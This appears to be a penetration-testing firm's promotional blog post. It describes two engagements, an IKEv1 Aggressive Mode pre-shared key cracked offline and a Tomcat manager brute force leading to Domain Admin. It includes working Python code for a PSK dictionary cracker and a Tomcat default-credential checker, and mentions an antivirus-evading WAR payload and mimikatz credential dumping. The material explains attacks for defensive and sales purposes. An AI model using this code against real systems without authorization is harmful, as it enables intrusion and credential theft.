A Black Box Penetration Test has advantages that routine vulnerability scanning cannot match: it finds issues that a scanner alone will not discover. A Black Box Penetration Test is an unauthenticated test, a penetration test in which the testers know little about the target other than perhaps an IP address, a URL, or a building location. In essence, the target's environment is a "black box". As ethical hackers, we have to determine what is inside the black box and how to exploit the vulnerabilities we discover within it.
Rather than discussing the advantages of a Black Box Penetration Test in theory, we will walk through two engagements in which Black Box Penetration Testing uncovered critical issues that the client's vulnerability scanner had missed or underrated.
Scenario 1: External Black Box Penetration Test - Internet Key Exchange (IKE) Aggressive Mode Issue
In this engagement, the client had a VPN server with IKEv1 Aggressive Mode enabled and pre-shared key (PSK) authentication. In Aggressive Mode the server answers a client's very first packet with an authentication hash derived from the PSK and the values exchanged in those first two messages (nonces, Diffie-Hellman public values, cookies, the SA proposal, and the server's identity). No encrypted channel exists yet at that point, so the hash and every value needed to recompute it travel in the clear. An attacker needs only to send a single Aggressive Mode proposal to the server to capture the hash, and can then run a dictionary attack against it offline, with no lockout and no further traffic to the target. Main Mode does not expose this, because its authentication hashes are sent only after the Diffie-Hellman exchange has encrypted the conversation.
In this scenario we also ran Nessus, a vulnerability scanner, which reported the IKE Aggressive Mode issue as Medium risk. As part of the penetration test we captured the VPN's PSK hash and cracked it offline in 19 minutes. The recovered PSK let us connect to the client's VPN, which had access to critical systems holding Protected Health Information (PHI). We reported this to the client immediately as a Critical finding, despite the Medium rating Nessus had assigned. The client resolved the issue by choosing a much stronger passphrase (long and random, so a dictionary attack cannot recover it) and by adding a second stage of authentication: after the VPN passphrase, the VPN client now prompts for Active Directory credentials.
The end result for this client is less risk and better protection of PHI. A "Medium" finding, as Nessus rated it, might never have been treated seriously or "gotten around to". Our Black Box Penetration Test turned it into a Critical finding, which was resolved immediately.
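The offline attack described above, as an added worked example (this is not code from the original post or from the firm's engagement). It implements the responder-hash construction from RFC 2409 for pre-shared key authentication, SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), and tests candidate PSKs from a wordlist against a captured HASH_R. The capture fields, the wordlist and the weak PSK "Summer2015" are constructed for the example; in a real engagement the fields come from the packet capture (ike-scan's `--pskcrack` output records them in exactly this form).

```python
import hmac

# Offline dictionary attack on an IKEv1 Aggressive Mode pre-shared key.
# RFC 2409, pre-shared key authentication:
#   SKEYID = prf(PSK, Ni_b | Nr_b)
#   HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
# prf is HMAC over the negotiated hash (MD5 or SHA-1). Every input except
# the PSK is readable in the two clear-text Aggressive Mode messages, so the
# attacker can test candidates without sending another packet to the target.


def skeyid(psk: bytes, ni: bytes, nr: bytes, hash_name: str = "sha1") -> bytes:
    """SKEYID keyed by the candidate PSK over the two nonces."""
    return hmac.new(psk, ni + nr, hash_name).digest()


def hash_r(psk: bytes, f: dict, hash_name: str = "sha1") -> bytes:
    """Recompute the responder's HASH_R for a candidate PSK."""
    key = skeyid(psk, f["ni"], f["nr"], hash_name)
    msg = f["gxr"] + f["gxi"] + f["cky_r"] + f["cky_i"] + f["sai"] + f["idir"]
    return hmac.new(key, msg, hash_name).digest()


def crack_psk(captured_hash_r: bytes, f: dict, wordlist, hash_name: str = "sha1"):
    """Return the first wordlist entry whose HASH_R matches the capture, else None."""
    for candidate in wordlist:
        guess = hash_r(candidate.encode(), f, hash_name)
        if hmac.compare_digest(guess, captured_hash_r):
            return candidate
    return None


# Constructed stand-ins for the values read from the capture (not real wire
# data; the Diffie-Hellman public values are shortened for readability).
CAPTURE = {
    "ni": bytes.fromhex("6f3c8e1a0b2d4c5e7f90a1b2c3d4e5f6"),   # initiator nonce
    "nr": bytes.fromhex("112233445566778899aabbccddeeff00"),   # responder nonce
    "gxi": bytes.fromhex("aa" * 32),                           # initiator DH public value
    "gxr": bytes.fromhex("bb" * 32),                           # responder DH public value
    "cky_i": bytes.fromhex("0102030405060708"),                # initiator cookie
    "cky_r": bytes.fromhex("0807060504030201"),                # responder cookie
    "sai": bytes.fromhex("00000001000000010000002801010001"),  # SA payload body (constructed)
    "idir": bytes.fromhex("02000000") + b"vpn.example.test",   # ID_FQDN payload body (constructed)
}

# In a real engagement this is the HASH_R taken from the capture. It is
# simulated here by a responder configured with a weak PSK.
CAPTURED_HASH_R = hash_r(b"Summer2015", CAPTURE)

# Constructed wordlist; a real run would use a large dictionary plus rules.
WORDLIST = ["password", "Welcome1", "vpnvpn", "Summer2015", "P@ssw0rd"]


if __name__ == "__main__":
    print(crack_psk(CAPTURED_HASH_R, CAPTURE, WORDLIST))  # Summer2015
```

Two practical notes. The hash algorithm must match the one negotiated in the SA (pass "md5" when the proposal used HMAC-MD5), and a defender's lesson is visible in the code: nothing here contacts the VPN server, so account lockouts and logging never trigger, and the only thing standing between an attacker and the tunnel is the entropy of the PSK.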
Scenario 2: Internal Black Box Penetration Test - Owning the Domain
This engagement was an on-site Black Box Penetration Test. We visited the client's facility, found an empty cubicle, unplugged the network cable from the computer there, and plugged it into our laptop. The jack accepted our device without question, so we began reconnaissance on the network. Our nmap results showed several web servers running on multiple ports. Manually browsing to each of them, we found that one was exposing the Tomcat manager interface. We used a Metasploit module to brute-force the Tomcat manager username and password, which allowed us to deploy a WAR file to the server. The WAR file contained a payload we had encoded to evade antimalware. Browsing to our deployed "package" on the web server gave us a shell, and that shell ran with enough privilege to read credential material from memory. From there we ran mimikatz and dumped credentials from RAM. One of them was an Active Directory "service" account, and that account was a member of Domain Admins. At this point we called off the engagement and worked with the client to mitigate these issues.
It is worth noting that in this scenario the client routinely performed vulnerability scanning, and the vector we used to gain complete access was never identified as a vulnerability by the vulnerability scanning software. That is not surprising: a weak password on an administrative interface, a service account running with more privilege than it needs, and a network jack that accepts any device are configuration and process weaknesses, which an unauthenticated scan often rates low or does not test for at all, rather than the missing patches a scanner is built to find.
As a result of this scenario the client implemented several security controls: 802.1X port authentication, so an unknown laptop can no longer simply take over a wall jack; reduced service account permissions, so a service account is no longer a Domain Admin; removal of unnecessary services, including the exposed management interface; and stronger passwords.
Unfortunately, many organizations have a false sense of security because they run a vulnerability scanning tool on a routine basis. We certainly believe that is a step in the right direction; however, a vulnerability scanning tool does not catch everything, and it does not show what an attacker can achieve by chaining together the issues it does find. If you are concerned about the true cybersecurity risk to your organization, consider a Black Box Penetration Test.
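The credential check that opened the path in this scenario, as an added example (this is not code from the original post or from the engagement, and it does not reproduce the WAR deployment or the credential dump). It performs the same test that Metasploit's tomcat_mgr_login scanner performs: try a list of default or weak credential pairs against the Tomcat manager HTML interface over HTTP Basic authentication, and report every pair the server does not reject. Because Tomcat answers 200 for a user holding the manager-gui role and 403 for a valid user that lacks it, both are reported rather than only the 200. The credential list, the host and the stub manager (a tiny local HTTP server that stands in for a real Tomcat so the example runs offline) are constructed for the example.

```python
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed list of credential pairs that appear in Tomcat documentation or
# are commonly found on unmanaged installs. A real check uses a larger list.
DEFAULT_CREDS = [
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("admin", ""),
    ("tomcat", "s3cret"),
    ("manager", "manager"),
]


def check_manager_creds(base_url: str, candidates, timeout: float = 5.0):
    """Try each (user, password) pair against <base_url>/manager/html.

    Returns a list of (user, password, status) for every pair the server did
    not answer with 401. Status 200 means the account holds manager-gui;
    403 means the password is valid but the account lacks the manager role,
    which is still a finding (the same password is usually reused elsewhere).
    """
    # Explicit empty ProxyHandler so environment proxy settings are ignored.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    url = base_url.rstrip("/") + "/manager/html"
    hits = []
    for user, password in candidates:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        try:
            with opener.open(req, timeout=timeout) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:
            status = err.code
        if status != 401:
            hits.append((user, password, status))
    return hits


class _StubManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the Tomcat manager: Basic auth, one valid account."""

    VALID = ("tomcat", "s3cret")

    def do_GET(self):
        if self.path != "/manager/html":
            self.send_error(404)
            return
        header = self.headers.get("Authorization", "")
        creds = None
        if header.startswith("Basic "):
            try:
                creds = tuple(base64.b64decode(header[6:]).decode().split(":", 1))
            except Exception:
                creds = None
        if creds == self.VALID:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html>Tomcat Web Application Manager</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
            self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def run_demo():
    """Start the stub on an ephemeral port, run the check against it, shut down."""
    server = HTTPServer(("127.0.0.1", 0), _StubManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_manager_creds(f"http://127.0.0.1:{server.server_address[1]}", DEFAULT_CREDS)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())  # [('tomcat', 's3cret', 200)]
```

Against a real target, point check_manager_creds at the scheme, host and port nmap reported; every hit with status 200 is a direct path to code execution on that server, because the manager interface exists precisely to deploy WAR files.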
Contact us with questions or to purchase a Black Box Penetration Test.